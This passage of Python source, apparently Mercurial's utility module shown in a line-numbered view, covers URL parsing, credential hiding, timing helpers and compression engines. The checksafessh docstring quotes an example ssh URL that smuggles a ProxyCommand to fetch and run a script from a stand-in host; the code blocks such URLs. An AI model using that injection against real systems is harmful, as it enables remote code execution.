3163 3171 # special case for Windows drive letters and UNC paths
3164 3172 if hasdriveletter(path) or path.startswith('\\\\'):
3165 3173 self.path = path
3166 3174 return
3167 3175
3168 3176 # For compatibility reasons, we can't handle bundle paths as
3169 3177 # normal URLS
3170 3178 if path.startswith('bundle:'):
3171 3179 self.scheme = 'bundle'
3172 3180 path = path[7:]
3173 3181 if path.startswith('//'):
3174 3182 path = path[2:]
3175 3183 self.path = path
3176 3184 return
3177 3185
3178 3186 if self._matchscheme(path):
3179 3187 parts = path.split(':', 1)
3180 3188 if parts[0]:
3181 3189 self.scheme, path = parts
3182 3190 self._localpath = False
3183 3191
3184 3192 if not path:
3185 3193 path = None
3186 3194 if self._localpath:
3187 3195 self.path = ''
3188 3196 return
3189 3197 else:
3190 3198 if self._localpath:
3191 3199 self.path = path
3192 3200 return
3193 3201
3194 3202 if parsequery and '?' in path:
3195 3203 path, self.query = path.split('?', 1)
3196 3204 if not path:
3197 3205 path = None
3198 3206 if not self.query:
3199 3207 self.query = None
3200 3208
3201 3209 # // is required to specify a host/authority
3202 3210 if path and path.startswith('//'):
3203 3211 parts = path[2:].split('/', 1)
3204 3212 if len(parts) > 1:
3205 3213 self.host, path = parts
3206 3214 else:
3207 3215 self.host = parts[0]
3208 3216 path = None
3209 3217 if not self.host:
3210 3218 self.host = None
3211 3219 # path of file:///d is /d
3212 3220 # path of file:///d:/ is d:/, not /d:/
3213 3221 if path and not hasdriveletter(path):
3214 3222 path = '/' + path
3215 3223
3216 3224 if self.host and '@' in self.host:
3217 3225 self.user, self.host = self.host.rsplit('@', 1)
3218 3226 if ':' in self.user:
3219 3227 self.user, self.passwd = self.user.split(':', 1)
3220 3228 if not self.host:
3221 3229 self.host = None
3222 3230
3223 3231 # Don't split on colons in IPv6 addresses without ports
3224 3232 if (self.host and ':' in self.host and
3225 3233 not (self.host.startswith('[') and self.host.endswith(']'))):
3226 3234 self._hostport = self.host
3227 3235 self.host, self.port = self.host.rsplit(':', 1)
3228 3236 if not self.host:
3229 3237 self.host = None
3230 3238
3231 3239 if (self.host and self.scheme == 'file' and
3232 3240 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3233 3241 raise Abort(_('file:// URLs can only refer to localhost'))
3234 3242
3235 3243 self.path = path
3236 3244
3237 3245 # leave the query string escaped
3238 3246 for a in ('user', 'passwd', 'host', 'port',
3239 3247 'path', 'fragment'):
3240 3248 v = getattr(self, a)
3241 3249 if v is not None:
3242 3250 setattr(self, a, urlreq.unquote(v))
3243 3251
3244 3252 @encoding.strmethod
3245 3253 def __repr__(self):
3246 3254 attrs = []
3247 3255 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3248 3256 'query', 'fragment'):
3249 3257 v = getattr(self, a)
3250 3258 if v is not None:
3251 3259 attrs.append('%s: %r' % (a, v))
3252 3260 return '<url %s>' % ', '.join(attrs)
3253 3261
3254 3262 def __bytes__(self):
3255 3263 r"""Join the URL's components back into a URL string.
3256 3264
3257 3265 Examples:
3258 3266
3259 3267 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3260 3268 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3261 3269 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3262 3270 'http://user:pw@host:80/?foo=bar&baz=42'
3263 3271 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3264 3272 'http://user:pw@host:80/?foo=bar%3dbaz'
3265 3273 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3266 3274 'ssh://user:pw@[::1]:2200//home/joe#'
3267 3275 >>> bytes(url(b'http://localhost:80//'))
3268 3276 'http://localhost:80//'
3269 3277 >>> bytes(url(b'http://localhost:80/'))
3270 3278 'http://localhost:80/'
3271 3279 >>> bytes(url(b'http://localhost:80'))
3272 3280 'http://localhost:80/'
3273 3281 >>> bytes(url(b'bundle:foo'))
3274 3282 'bundle:foo'
3275 3283 >>> bytes(url(b'bundle://../foo'))
3276 3284 'bundle:../foo'
3277 3285 >>> bytes(url(b'path'))
3278 3286 'path'
3279 3287 >>> bytes(url(b'file:///tmp/foo/bar'))
3280 3288 'file:///tmp/foo/bar'
3281 3289 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3282 3290 'file:///c:/tmp/foo/bar'
3283 3291 >>> print(url(br'bundle:foo\bar'))
3284 3292 bundle:foo\bar
3285 3293 >>> print(url(br'file:///D:\data\hg'))
3286 3294 file:///D:\data\hg
3287 3295 """
3288 3296 if self._localpath:
3289 3297 s = self.path
3290 3298 if self.scheme == 'bundle':
3291 3299 s = 'bundle:' + s
3292 3300 if self.fragment:
3293 3301 s += '#' + self.fragment
3294 3302 return s
3295 3303
3296 3304 s = self.scheme + ':'
3297 3305 if self.user or self.passwd or self.host:
3298 3306 s += '//'
3299 3307 elif self.scheme and (not self.path or self.path.startswith('/')
3300 3308 or hasdriveletter(self.path)):
3301 3309 s += '//'
3302 3310 if hasdriveletter(self.path):
3303 3311 s += '/'
3304 3312 if self.user:
3305 3313 s += urlreq.quote(self.user, safe=self._safechars)
3306 3314 if self.passwd:
3307 3315 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3308 3316 if self.user or self.passwd:
3309 3317 s += '@'
3310 3318 if self.host:
3311 3319 if not (self.host.startswith('[') and self.host.endswith(']')):
3312 3320 s += urlreq.quote(self.host)
3313 3321 else:
3314 3322 s += self.host
3315 3323 if self.port:
3316 3324 s += ':' + urlreq.quote(self.port)
3317 3325 if self.host:
3318 3326 s += '/'
3319 3327 if self.path:
3320 3328 # TODO: similar to the query string, we should not unescape the
3321 3329 # path when we store it, the path might contain '%2f' = '/',
3322 3330 # which we should *not* escape.
3323 3331 s += urlreq.quote(self.path, safe=self._safepchars)
3324 3332 if self.query:
3325 3333 # we store the query in escaped form.
3326 3334 s += '?' + self.query
3327 3335 if self.fragment is not None:
3328 3336 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3329 3337 return s
3330 3338
3331 3339 __str__ = encoding.strmethod(__bytes__)
3332 3340
3333 3341 def authinfo(self):
3334 3342 user, passwd = self.user, self.passwd
3335 3343 try:
3336 3344 self.user, self.passwd = None, None
3337 3345 s = bytes(self)
3338 3346 finally:
3339 3347 self.user, self.passwd = user, passwd
3340 3348 if not self.user:
3341 3349 return (s, None)
3342 3350 # authinfo[1] is passed to urllib2 password manager, and its
3343 3351 # URIs must not contain credentials. The host is passed in the
3344 3352 # URIs list because Python < 2.4.3 uses only that to search for
3345 3353 # a password.
3346 3354 return (s, (None, (s, self.host),
3347 3355 self.user, self.passwd or ''))
3348 3356
3349 3357 def isabs(self):
3350 3358 if self.scheme and self.scheme != 'file':
3351 3359 return True # remote URL
3352 3360 if hasdriveletter(self.path):
3353 3361 return True # absolute for our purposes - can't be joined()
3354 3362 if self.path.startswith(br'\\'):
3355 3363 return True # Windows UNC path
3356 3364 if self.path.startswith('/'):
3357 3365 return True # POSIX-style
3358 3366 return False
3359 3367
3360 3368 def localpath(self):
3361 3369 if self.scheme == 'file' or self.scheme == 'bundle':
3362 3370 path = self.path or '/'
3363 3371 # For Windows, we need to promote hosts containing drive
3364 3372 # letters to paths with drive letters.
3365 3373 if hasdriveletter(self._hostport):
3366 3374 path = self._hostport + '/' + self.path
3367 3375 elif (self.host is not None and self.path
3368 3376 and not hasdriveletter(path)):
3369 3377 path = '/' + path
3370 3378 return path
3371 3379 return self._origpath
3372 3380
3373 3381 def islocal(self):
3374 3382 '''whether localpath will return something that posixfile can open'''
3375 3383 return (not self.scheme or self.scheme == 'file'
3376 3384 or self.scheme == 'bundle')
3377 3385
3378 3386 def hasscheme(path):
3379 3387 return bool(url(path).scheme)
3380 3388
3381 3389 def hasdriveletter(path):
3382 3390 return path and path[1:2] == ':' and path[0:1].isalpha()
3383 3391
3384 3392 def urllocalpath(path):
3385 3393 return url(path, parsequery=False, parsefragment=False).localpath()
3386 3394
3387 3395 def checksafessh(path):
3388 3396 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3389 3397
3390 3398 This is a sanity check for ssh urls. ssh will parse the first item as
3391 3399 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3392 3400 Let's prevent these potentially exploited urls entirely and warn the
3393 3401 user.
3394 3402
3395 3403 Raises an error.Abort when the url is unsafe.
3396 3404 """
3397 3405 path = urlreq.unquote(path)
3398 3406 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3399 3407 raise error.Abort(_('potentially unsafe url: %r') %
3400 3408 (pycompat.bytestr(path),))
3401 3409
3402 3410 def hidepassword(u):
3403 3411 '''hide user credential in a url string'''
3404 3412 u = url(u)
3405 3413 if u.passwd:
3406 3414 u.passwd = '***'
3407 3415 return bytes(u)
3408 3416
3409 3417 def removeauth(u):
3410 3418 '''remove all authentication information from a url string'''
3411 3419 u = url(u)
3412 3420 u.user = u.passwd = None
3413 3421 return str(u)
3414 3422
3415 3423 timecount = unitcountfn(
3416 3424 (1, 1e3, _('%.0f s')),
3417 3425 (100, 1, _('%.1f s')),
3418 3426 (10, 1, _('%.2f s')),
3419 3427 (1, 1, _('%.3f s')),
3420 3428 (100, 0.001, _('%.1f ms')),
3421 3429 (10, 0.001, _('%.2f ms')),
3422 3430 (1, 0.001, _('%.3f ms')),
3423 3431 (100, 0.000001, _('%.1f us')),
3424 3432 (10, 0.000001, _('%.2f us')),
3425 3433 (1, 0.000001, _('%.3f us')),
3426 3434 (100, 0.000000001, _('%.1f ns')),
3427 3435 (10, 0.000000001, _('%.2f ns')),
3428 3436 (1, 0.000000001, _('%.3f ns')),
3429 3437 )
3430 3438
3431 3439 _timenesting = [0]
3432 3440
3433 3441 def timed(func):
3434 3442 '''Report the execution time of a function call to stderr.
3435 3443
3436 3444 During development, use as a decorator when you need to measure
3437 3445 the cost of a function, e.g. as follows:
3438 3446
3439 3447 @util.timed
3440 3448 def foo(a, b, c):
3441 3449 pass
3442 3450 '''
3443 3451
3444 3452 def wrapper(*args, **kwargs):
3445 3453 start = timer()
3446 3454 indent = 2
3447 3455 _timenesting[0] += indent
3448 3456 try:
3449 3457 return func(*args, **kwargs)
3450 3458 finally:
3451 3459 elapsed = timer() - start
3452 3460 _timenesting[0] -= indent
3453 3461 stderr.write('%s%s: %s\n' %
3454 3462 (' ' * _timenesting[0], func.__name__,
3455 3463 timecount(elapsed)))
3456 3464 return wrapper
3457 3465
3458 3466 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3459 3467 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3460 3468
3461 3469 def sizetoint(s):
3462 3470 '''Convert a space specifier to a byte count.
3463 3471
3464 3472 >>> sizetoint(b'30')
3465 3473 30
3466 3474 >>> sizetoint(b'2.2kb')
3467 3475 2252
3468 3476 >>> sizetoint(b'6M')
3469 3477 6291456
3470 3478 '''
3471 3479 t = s.strip().lower()
3472 3480 try:
3473 3481 for k, u in _sizeunits:
3474 3482 if t.endswith(k):
3475 3483 return int(float(t[:-len(k)]) * u)
3476 3484 return int(t)
3477 3485 except ValueError:
3478 3486 raise error.ParseError(_("couldn't parse size: %s") % s)
3479 3487
3480 3488 class hooks(object):
3481 3489 '''A collection of hook functions that can be used to extend a
3482 3490 function's behavior. Hooks are called in lexicographic order,
3483 3491 based on the names of their sources.'''
3484 3492
3485 3493 def __init__(self):
3486 3494 self._hooks = []
3487 3495
3488 3496 def add(self, source, hook):
3489 3497 self._hooks.append((source, hook))
3490 3498
3491 3499 def __call__(self, *args):
3492 3500 self._hooks.sort(key=lambda x: x[0])
3493 3501 results = []
3494 3502 for source, hook in self._hooks:
3495 3503 results.append(hook(*args))
3496 3504 return results
3497 3505
3498 3506 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3499 3507 '''Yields lines for a nicely formatted stacktrace.
3500 3508 Skips the 'skip' last entries, then return the last 'depth' entries.
3501 3509 Each file+linenumber is formatted according to fileline.
3502 3510 Each line is formatted according to line.
3503 3511 If line is None, it yields:
3504 3512 length of longest filepath+line number,
3505 3513 filepath+linenumber,
3506 3514 function
3507 3515
3508 3516 Not be used in production code but very convenient while developing.
3509 3517 '''
3510 3518 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3511 3519 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3512 3520 ][-depth:]
3513 3521 if entries:
3514 3522 fnmax = max(len(entry[0]) for entry in entries)
3515 3523 for fnln, func in entries:
3516 3524 if line is None:
3517 3525 yield (fnmax, fnln, func)
3518 3526 else:
3519 3527 yield line % (fnmax, fnln, func)
3520 3528
3521 3529 def debugstacktrace(msg='stacktrace', skip=0,
3522 3530 f=stderr, otherf=stdout, depth=0):
3523 3531 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3524 3532 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3525 3533 By default it will flush stdout first.
3526 3534 It can be used everywhere and intentionally does not require an ui object.
3527 3535 Not be used in production code but very convenient while developing.
3528 3536 '''
3529 3537 if otherf:
3530 3538 otherf.flush()
3531 3539 f.write('%s at:\n' % msg.rstrip())
3532 3540 for line in getstackframes(skip + 1, depth=depth):
3533 3541 f.write(line)
3534 3542 f.flush()
3535 3543
3536 3544 class dirs(object):
3537 3545 '''a multiset of directory names from a dirstate or manifest'''
3538 3546
3539 3547 def __init__(self, map, skip=None):
3540 3548 self._dirs = {}
3541 3549 addpath = self.addpath
3542 3550 if safehasattr(map, 'iteritems') and skip is not None:
3543 3551 for f, s in map.iteritems():
3544 3552 if s[0] != skip:
3545 3553 addpath(f)
3546 3554 else:
3547 3555 for f in map:
3548 3556 addpath(f)
3549 3557
3550 3558 def addpath(self, path):
3551 3559 dirs = self._dirs
3552 3560 for base in finddirs(path):
3553 3561 if base in dirs:
3554 3562 dirs[base] += 1
3555 3563 return
3556 3564 dirs[base] = 1
3557 3565
3558 3566 def delpath(self, path):
3559 3567 dirs = self._dirs
3560 3568 for base in finddirs(path):
3561 3569 if dirs[base] > 1:
3562 3570 dirs[base] -= 1
3563 3571 return
3564 3572 del dirs[base]
3565 3573
3566 3574 def __iter__(self):
3567 3575 return iter(self._dirs)
3568 3576
3569 3577 def __contains__(self, d):
3570 3578 return d in self._dirs
3571 3579
3572 3580 if safehasattr(parsers, 'dirs'):
3573 3581 dirs = parsers.dirs
3574 3582
3575 3583 def finddirs(path):
3576 3584 pos = path.rfind('/')
3577 3585 while pos != -1:
3578 3586 yield path[:pos]
3579 3587 pos = path.rfind('/', 0, pos)
3580 3588
3581 3589 # compression code
3582 3590
3583 3591 SERVERROLE = 'server'
3584 3592 CLIENTROLE = 'client'
3585 3593
3586 3594 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3587 3595 (u'name', u'serverpriority',
3588 3596 u'clientpriority'))
3589 3597
3590 3598 class compressormanager(object):
3591 3599 """Holds registrations of various compression engines.
3592 3600
3593 3601 This class essentially abstracts the differences between compression
3594 3602 engines to allow new compression formats to be added easily, possibly from
3595 3603 extensions.
3596 3604
3597 3605 Compressors are registered against the global instance by calling its
3598 3606 ``register()`` method.
3599 3607 """
3600 3608 def __init__(self):
3601 3609 self._engines = {}
3602 3610 # Bundle spec human name to engine name.
3603 3611 self._bundlenames = {}
3604 3612 # Internal bundle identifier to engine name.
3605 3613 self._bundletypes = {}
3606 3614 # Revlog header to engine name.
3607 3615 self._revlogheaders = {}
3608 3616 # Wire proto identifier to engine name.
3609 3617 self._wiretypes = {}
3610 3618
3611 3619 def __getitem__(self, key):
3612 3620 return self._engines[key]
3613 3621
3614 3622 def __contains__(self, key):
3615 3623 return key in self._engines
3616 3624
3617 3625 def __iter__(self):
3618 3626 return iter(self._engines.keys())
3619 3627
3620 3628 def register(self, engine):
3621 3629 """Register a compression engine with the manager.
3622 3630
3623 3631 The argument must be a ``compressionengine`` instance.
3624 3632 """
3625 3633 if not isinstance(engine, compressionengine):
3626 3634 raise ValueError(_('argument must be a compressionengine'))
3627 3635
3628 3636 name = engine.name()
3629 3637
3630 3638 if name in self._engines:
3631 3639 raise error.Abort(_('compression engine %s already registered') %
3632 3640 name)
3633 3641
3634 3642 bundleinfo = engine.bundletype()
3635 3643 if bundleinfo:
3636 3644 bundlename, bundletype = bundleinfo
3637 3645
3638 3646 if bundlename in self._bundlenames:
3639 3647 raise error.Abort(_('bundle name %s already registered') %
3640 3648 bundlename)
3641 3649 if bundletype in self._bundletypes:
3642 3650 raise error.Abort(_('bundle type %s already registered by %s') %
3643 3651 (bundletype, self._bundletypes[bundletype]))
3644 3652
3645 3653 # No external facing name declared.
3646 3654 if bundlename:
3647 3655 self._bundlenames[bundlename] = name
3648 3656
3649 3657 self._bundletypes[bundletype] = name
3650 3658
3651 3659 wiresupport = engine.wireprotosupport()
3652 3660 if wiresupport:
3653 3661 wiretype = wiresupport.name
3654 3662 if wiretype in self._wiretypes:
3655 3663 raise error.Abort(_('wire protocol compression %s already '
3656 3664 'registered by %s') %
3657 3665 (wiretype, self._wiretypes[wiretype]))
3658 3666
3659 3667 self._wiretypes[wiretype] = name
3660 3668
3661 3669 revlogheader = engine.revlogheader()
3662 3670 if revlogheader and revlogheader in self._revlogheaders:
3663 3671 raise error.Abort(_('revlog header %s already registered by %s') %
3664 3672 (revlogheader, self._revlogheaders[revlogheader]))
3665 3673
3666 3674 if revlogheader:
3667 3675 self._revlogheaders[revlogheader] = name
3668 3676
3669 3677 self._engines[name] = engine
3670 3678
3671 3679 @property
3672 3680 def supportedbundlenames(self):
3673 3681 return set(self._bundlenames.keys())
3674 3682
3675 3683 @property
3676 3684 def supportedbundletypes(self):
3677 3685 return set(self._bundletypes.keys())
3678 3686
3679 3687 def forbundlename(self, bundlename):
3680 3688 """Obtain a compression engine registered to a bundle name.
3681 3689
3682 3690 Will raise KeyError if the bundle type isn't registered.
3683 3691
3684 3692 Will abort if the engine is known but not available.
3685 3693 """
3686 3694 engine = self._engines[self._bundlenames[bundlename]]
3687 3695 if not engine.available():
3688 3696 raise error.Abort(_('compression engine %s could not be loaded') %
3689 3697 engine.name())
3690 3698 return engine
3691 3699
3692 3700 def forbundletype(self, bundletype):
3693 3701 """Obtain a compression engine registered to a bundle type.
3694 3702
3695 3703 Will raise KeyError if the bundle type isn't registered.
3696 3704
3697 3705 Will abort if the engine is known but not available.
3698 3706 """
3699 3707 engine = self._engines[self._bundletypes[bundletype]]
3700 3708 if not engine.available():
3701 3709 raise error.Abort(_('compression engine %s could not be loaded') %
3702 3710 engine.name())
3703 3711 return engine
3704 3712
3705 3713 def supportedwireengines(self, role, onlyavailable=True):
3706 3714 """Obtain compression engines that support the wire protocol.
3707 3715
3708 3716 Returns a list of engines in prioritized order, most desired first.
3709 3717
3710 3718 If ``onlyavailable`` is set, filter out engines that can't be
3711 3719 loaded.
3712 3720 """
3713 3721 assert role in (SERVERROLE, CLIENTROLE)
3714 3722
3715 3723 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3716 3724
3717 3725 engines = [self._engines[e] for e in self._wiretypes.values()]
3718 3726 if onlyavailable:
3719 3727 engines = [e for e in engines if e.available()]
3720 3728
3721 3729 def getkey(e):
3722 3730 # Sort first by priority, highest first. In case of tie, sort
3723 3731 # alphabetically. This is arbitrary, but ensures output is
3724 3732 # stable.
3725 3733 w = e.wireprotosupport()
3726 3734 return -1 * getattr(w, attr), w.name
3727 3735
3728 3736 return list(sorted(engines, key=getkey))
3729 3737
3730 3738 def forwiretype(self, wiretype):
3731 3739 engine = self._engines[self._wiretypes[wiretype]]
3732 3740 if not engine.available():
3733 3741 raise error.Abort(_('compression engine %s could not be loaded') %
3734 3742 engine.name())
3735 3743 return engine
3736 3744
3737 3745 def forrevlogheader(self, header):
3738 3746 """Obtain a compression engine registered to a revlog header.
3739 3747
3740 3748 Will raise KeyError if the revlog header value isn't registered.
3741 3749 """
3742 3750 return self._engines[self._revlogheaders[header]]
3743 3751
3744 3752 compengines = compressormanager()
3745 3753
3746 3754 class compressionengine(object):
3747 3755 """Base class for compression engines.
3748 3756
3749 3757 Compression engines must implement the interface defined by this class.
3750 3758 """
3751 3759 def name(self):
3752 3760 """Returns the name of the compression engine.
3753 3761
3754 3762 This is the key the engine is registered under.
3755 3763
3756 3764 This method must be implemented.
3757 3765 """
3758 3766 raise NotImplementedError()
3759 3767
3760 3768 def available(self):
3761 3769 """Whether the compression engine is available.
3762 3770
3763 3771 The intent of this method is to allow optional compression engines
3764 3772 that may not be available in all installations (such as engines relying
3765 3773 on C extensions that may not be present).
3766 3774 """
3767 3775 return True
3768 3776
3769 3777 def bundletype(self):
3770 3778 """Describes bundle identifiers for this engine.
3771 3779
3772 3780 If this compression engine isn't supported for bundles, returns None.
3773 3781
3774 3782 If this engine can be used for bundles, returns a 2-tuple of strings of
3775 3783 the user-facing "bundle spec" compression name and an internal
3776 3784 identifier used to denote the compression format within bundles. To
3777 3785 exclude the name from external usage, set the first element to ``None``.
3778 3786
3779 3787 If bundle compression is supported, the class must also implement
3780 3788 ``compressstream`` and `decompressorreader``.
3781 3789
3782 3790 The docstring of this method is used in the help system to tell users
3783 3791 about this engine.
3784 3792 """
3785 3793 return None
3786 3794
3787 3795 def wireprotosupport(self):
3788 3796 """Declare support for this compression format on the wire protocol.
3789 3797
3790 3798 If this compression engine isn't supported for compressing wire
3791 3799 protocol payloads, returns None.
3792 3800
3793 3801 Otherwise, returns ``compenginewireprotosupport`` with the following
3794 3802 fields:
3795 3803
3796 3804 * String format identifier
3797 3805 * Integer priority for the server
3798 3806 * Integer priority for the client
3799 3807
3800 3808 The integer priorities are used to order the advertisement of format
3801 3809 support by server and client. The highest integer is advertised
3802 3810 first. Integers with non-positive values aren't advertised.
3803 3811
3804 3812 The priority values are somewhat arbitrary and only used for default
3805 3813 ordering. The relative order can be changed via config options.
3806 3814
3807 3815 If wire protocol compression is supported, the class must also implement
3808 3816 ``compressstream`` and ``decompressorreader``.
3809 3817 """
3810 3818 return None
3811 3819
3812 3820 def revlogheader(self):
3813 3821 """Header added to revlog chunks that identifies this engine.
3814 3822
3815 3823 If this engine can be used to compress revlogs, this method should
3816 3824 return the bytes used to identify chunks compressed with this engine.
3817 3825 Else, the method should return ``None`` to indicate it does not
3818 3826 participate in revlog compression.
3819 3827 """
3820 3828 return None
3821 3829
3822 3830 def compressstream(self, it, opts=None):
3823 3831 """Compress an iterator of chunks.
3824 3832
3825 3833 The method receives an iterator (ideally a generator) of chunks of
3826 3834 bytes to be compressed. It returns an iterator (ideally a generator)
3827 3835 of bytes of chunks representing the compressed output.
3828 3836
3829 3837 Optionally accepts an argument defining how to perform compression.
3830 3838 Each engine treats this argument differently.
3831 3839 """
3832 3840 raise NotImplementedError()
3833 3841
3834 3842 def decompressorreader(self, fh):
3835 3843 """Perform decompression on a file object.
3836 3844
3837 3845 Argument is an object with a ``read(size)`` method that returns
3838 3846 compressed data. Return value is an object with a ``read(size)`` that
3839 3847 returns uncompressed data.
3840 3848 """
3841 3849 raise NotImplementedError()
3842 3850
3843 3851 def revlogcompressor(self, opts=None):
3844 3852 """Obtain an object that can be used to compress revlog entries.
3845 3853
3846 3854 The object has a ``compress(data)`` method that compresses binary
3847 3855 data. This method returns compressed binary data or ``None`` if
3848 3856 the data could not be compressed (too small, not compressible, etc).
3849 3857 The returned data should have a header uniquely identifying this
3850 3858 compression format so decompression can be routed to this engine.
3851 3859 This header should be identified by the ``revlogheader()`` return
3852 3860 value.
3853 3861
3854 3862 The object has a ``decompress(data)`` method that decompresses
3855 3863 data. The method will only be called if ``data`` begins with
3856 3864 ``revlogheader()``. The method should return the raw, uncompressed
3857 3865 data or raise a ``RevlogError``.
3858 3866
3859 3867 The object is reusable but is not thread safe.
3860 3868 """
3861 3869 raise NotImplementedError()
3862 3870
3863 3871 class _zlibengine(compressionengine):
3864 3872 def name(self):
3865 3873 return 'zlib'
3866 3874
3867 3875 def bundletype(self):
3868 3876 """zlib compression using the DEFLATE algorithm.
3869 3877
3870 3878 All Mercurial clients should support this format. The compression
3871 3879 algorithm strikes a reasonable balance between compression ratio
3872 3880 and size.
3873 3881 """
3874 3882 return 'gzip', 'GZ'
3875 3883
3876 3884 def wireprotosupport(self):
3877 3885 return compewireprotosupport('zlib', 20, 20)
3878 3886
3879 3887 def revlogheader(self):
3880 3888 return 'x'
3881 3889
3882 3890 def compressstream(self, it, opts=None):
3883 3891 opts = opts or {}
3884 3892
3885 3893 z = zlib.compressobj(opts.get('level', -1))
3886 3894 for chunk in it:
3887 3895 data = z.compress(chunk)
3888 3896 # Not all calls to compress emit data. It is cheaper to inspect
3889 3897 # here than to feed empty chunks through generator.
3890 3898 if data:
3891 3899 yield data
3892 3900
3893 3901 yield z.flush()
3894 3902
3895 3903 def decompressorreader(self, fh):
3896 3904 def gen():
3897 3905 d = zlib.decompressobj()
3898 3906 for chunk in filechunkiter(fh):
3899 3907 while chunk:
3900 3908 # Limit output size to limit memory.
3901 3909 yield d.decompress(chunk, 2 ** 18)
3902 3910 chunk = d.unconsumed_tail
3903 3911
3904 3912 return chunkbuffer(gen())
3905 3913
3906 3914 class zlibrevlogcompressor(object):
3907 3915 def compress(self, data):
3908 3916 insize = len(data)
3909 3917 # Caller handles empty input case.
3910 3918 assert insize > 0
3911 3919
3912 3920 if insize < 44:
3913 3921 return None
3914 3922
3915 3923 elif insize <= 1000000:
3916 3924 compressed = zlib.compress(data)
3917 3925 if len(compressed) < insize:
3918 3926 return compressed
3919 3927 return None
3920 3928
3921 3929 # zlib makes an internal copy of the input buffer, doubling
3922 3930 # memory usage for large inputs. So do streaming compression
3923 3931 # on large inputs.
3924 3932 else:
3925 3933 z = zlib.compressobj()
3926 3934 parts = []
3927 3935 pos = 0
3928 3936 while pos < insize:
3929 3937 pos2 = pos + 2**20
3930 3938 parts.append(z.compress(data[pos:pos2]))
3931 3939 pos = pos2
3932 3940 parts.append(z.flush())
3933 3941
3934 3942 if sum(map(len, parts)) < insize:
3935 3943 return ''.join(parts)
3936 3944 return None
3937 3945
3938 3946 def decompress(self, data):
3939 3947 try:
3940 3948 return zlib.decompress(data)
3941 3949 except zlib.error as e:
3942 3950 raise error.RevlogError(_('revlog decompress error: %s') %
3943 3951 forcebytestr(e))
3944 3952
3945 3953 def revlogcompressor(self, opts=None):
3946 3954 return self.zlibrevlogcompressor()
3947 3955
3948 3956 compengines.register(_zlibengine())
3949 3957
3950 3958 class _bz2engine(compressionengine):
3951 3959 def name(self):
3952 3960 return 'bz2'
3953 3961
3954 3962 def bundletype(self):
3955 3963 """An algorithm that produces smaller bundles than ``gzip``.
3956 3964
3957 3965 All Mercurial clients should support this format.
3958 3966
3959 3967 This engine will likely produce smaller bundles than ``gzip`` but
3960 3968 will be significantly slower, both during compression and
3961 3969 decompression.
3962 3970
3963 3971 If available, the ``zstd`` engine can yield similar or better
3964 3972 compression at much higher speeds.
3965 3973 """
3966 3974 return 'bzip2', 'BZ'
3967 3975
3968 3976 # We declare a protocol name but don't advertise by default because
3969 3977 # it is slow.
3970 3978 def wireprotosupport(self):
3971 3979 return compewireprotosupport('bzip2', 0, 0)
3972 3980
3973 3981 def compressstream(self, it, opts=None):
3974 3982 opts = opts or {}
3975 3983 z = bz2.BZ2Compressor(opts.get('level', 9))
3976 3984 for chunk in it:
3977 3985 data = z.compress(chunk)
3978 3986 if data:
3979 3987 yield data
3980 3988
3981 3989 yield z.flush()
3982 3990
3983 3991 def decompressorreader(self, fh):
3984 3992 def gen():
3985 3993 d = bz2.BZ2Decompressor()
3986 3994 for chunk in filechunkiter(fh):
3987 3995 yield d.decompress(chunk)
3988 3996
3989 3997 return chunkbuffer(gen())
3990 3998
3991 3999 compengines.register(_bz2engine())
3992 4000
3993 4001 class _truncatedbz2engine(compressionengine):
3994 4002 def name(self):
3995 4003 return 'bz2truncated'
3996 4004
3997 4005 def bundletype(self):
3998 4006 return None, '_truncatedBZ'
3999 4007
4000 4008 # We don't implement compressstream because it is hackily handled elsewhere.
4001 4009
4002 4010 def decompressorreader(self, fh):
4003 4011 def gen():
4004 4012 # The input stream doesn't have the 'BZ' header. So add it back.
4005 4013 d = bz2.BZ2Decompressor()
4006 4014 d.decompress('BZ')
4007 4015 for chunk in filechunkiter(fh):
4008 4016 yield d.decompress(chunk)
4009 4017
4010 4018 return chunkbuffer(gen())
4011 4019
4012 4020 compengines.register(_truncatedbz2engine())
4013 4021
4014 4022 class _noopengine(compressionengine):
4015 4023 def name(self):
4016 4024 return 'none'
4017 4025
4018 4026 def bundletype(self):
4019 4027 """No compression is performed.
4020 4028
4021 4029 Use this compression engine to explicitly disable compression.
4022 4030 """
4023 4031 return 'none', 'UN'
4024 4032
4025 4033 # Clients always support uncompressed payloads. Servers don't because
4026 4034 # unless you are on a fast network, uncompressed payloads can easily
4027 4035 # saturate your network pipe.
4028 4036 def wireprotosupport(self):
4029 4037 return compewireprotosupport('none', 0, 10)
4030 4038
4031 4039 # We don't implement revlogheader because it is handled specially
4032 4040 # in the revlog class.
4033 4041
4034 4042 def compressstream(self, it, opts=None):
4035 4043 return it
4036 4044
4037 4045 def decompressorreader(self, fh):
4038 4046 return fh
4039 4047
4040 4048 class nooprevlogcompressor(object):
4041 4049 def compress(self, data):
4042 4050 return None
4043 4051
4044 4052 def revlogcompressor(self, opts=None):
4045 4053 return self.nooprevlogcompressor()
4046 4054
4047 4055 compengines.register(_noopengine())
4048 4056
4049 4057 class _zstdengine(compressionengine):
4050 4058 def name(self):
4051 4059 return 'zstd'
4052 4060
4053 4061 @propertycache
4054 4062 def _module(self):
4055 4063 # Not all installs have the zstd module available. So defer importing
4056 4064 # until first access.
4057 4065 try:
4058 4066 from . import zstd
